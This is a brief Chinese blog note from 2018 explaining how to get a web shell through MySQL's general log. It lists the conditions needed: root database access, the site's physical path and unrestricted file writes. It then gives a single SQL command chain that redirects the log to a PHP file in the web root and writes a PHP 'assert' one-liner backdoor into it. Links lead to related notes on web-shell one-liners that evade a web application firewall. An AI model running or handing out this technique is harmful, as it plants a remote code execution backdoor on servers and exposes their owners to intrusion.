Mysql通过日志拿shell
emmm~有点舒服
0x00 利用条件
root
网站物理路径
文件位置未被限制
0x01 SQL语句
set global general_log = on; set global general_log_file = 'C:/phpStudy/WWW/dyboy.php'; select '<?php @assert($_POST["dyboy"]); ?>'; set global general_log = off;
上一篇
[笔记]PHP过狗一句话
[笔记]PHP过狗一句话
下一篇
[笔记]ASP过狗一句话
[笔记]ASP过狗一句话
版权声明:《 [笔记]Mysql通过日志拿shell 》为DYBOY原创文章,转载请注明出处!
最后编辑:2018-6-15 14:06:21